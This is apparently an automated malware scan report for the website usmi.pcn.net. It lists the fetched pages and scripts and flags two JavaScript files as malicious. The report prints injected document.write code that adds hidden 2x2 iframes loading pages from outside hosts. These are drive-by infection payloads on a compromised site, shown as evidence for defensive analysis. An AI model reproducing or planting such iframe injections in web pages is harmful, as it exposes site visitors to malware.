Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=usmi.pcn.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.usmi.pcn.net/ | HTTP/1.1 200 OK Connection: close Date: Thu, 26 Feb 2015 11:33:52 GMT Accept-Ranges: bytes ETag: "4f857a-431-4eca0fff5fd17" Server: Apache/2.2.15 (CentOS) Content-Length: 1073 Content-Type: text/html Last-Modified: Tue, 03 Dec 2013 13:09:00 GMT | clean |
http://www.usminazionale.it/ | HTTP/1.1 200 OK Date: Thu, 26 Feb 2015 11:06:09 GMT Accept-Ranges: bytes ETag: "3274fa74eb50d01:22c2" Server: Microsoft-IIS/6.0 Content-Length: 86282 Content-Location: http://www.usminazionale.it/index.html Content-Type: text/html Last-Modified: Wed, 25 Feb 2015 11:09:00 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.usminazionale.it/index.html | 200 OK Content-Length: 86282 Content-Type: text/html | clean |
http://www.usminazionale.it/js/time.js | 200 OK Content-Length: 805 Content-Type: application/x-javascript | clean |
http://www.usmi.pcn.net/js/menustyle.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.usmi.pcn.net/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://www.usmi.pcn.net/js/script.js | 200 OK Content-Length: 4968 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934></iframe>');
<!-- FUNZIONI PER LA VISUALIZZAZIONE DHTML <!-- creazione della classe Browser per definire il tipo di browser function Browser() { this.n4 = (document.layers) ? 1 : 0; this.ie = (document.all) ? 1 : 0; this.n6 = (document.getElementById) ? 1 : 0; } <!-- defi visit++; SetCookie("dhtmlFlash", visit, expdate, "/", null, false); if(visit > 1){ visitato = true; }else{ visitato = false; } } <!-- funzione per resettare il cookie //--> function ResetCounts() { var expdate = new Date(); expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000 * 365)); visit = 0; SetCookie("dhtmlFlash", visit, expdate , "/", null, false); leapto(); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=433934 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934> | ||
http://www.usmi.pcn.net/animate.js | 200 OK Content-Length: 14586 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=433934></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934></iframe>'); <!-- dynamicanimAttr = "dynamicanimation" animCancel = "skipanim" fpanimationPrefix = "fpAnim" animat var ms = navigator.appVersion.indexOf("MSIE") ie4 = (ms>0) && (parseInt(navigator.appVersion.substring(ms+5, ms+6)) >= 4) if(ie4) { ts=el.style.cssText el.style.cssText=el.fprolloverstyle el.fprolloverstyle=ts } } function clickSwapImg(el) { if(document.all || document.layers) { ts=el.src el.src=el.lowsrc el.lowsrc=ts } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=433934 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=433934> Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emad.html?j=433934 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emad.html?j=433934> | ||
http://www.usmi.pcn.net//ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js/ | 404 Not Found Content-Length: 338 Content-Type: text/html | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 115360 Content-Type: application/javascript | clean |
http://codice.shinystat.it/cgi-bin/getcod.cgi?USER=usmiweb | 200 OK Content-Length: 5607 Content-Type: application/x-javascript | clean |
http://www.fides.org/services/jsnews.php?lan=ita&nn=3 | 404 Not Found Content-Length: 5873 Content-Type: text/html | clean |
http://www.fides.org/it | 200 OK Content-Length: 13925 Content-Type: text/html | clean |
http://www.fides.org/es | 200 OK Content-Length: 14148 Content-Type: text/html | clean |
http://www.fides.org/en | 200 OK Content-Length: 13722 Content-Type: text/html | clean |
http://www.fides.org/fr | 200 OK Content-Length: 15081 Content-Type: text/html | clean |
http://www.fides.org/pt | 200 OK Content-Length: 13627 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: usmi.pcn.net
Result:
GET / HTTP/1.1
Host: usmi.pcn.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: usmi.pcn.net
Referer: http://www.google.com/search?q=usmi.pcn.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: usmi.pcn.net
Referer: http://www.google.com/search?q=usmi.pcn.net
Result:
The result is similar to the first query. There are no suspicious redirects found.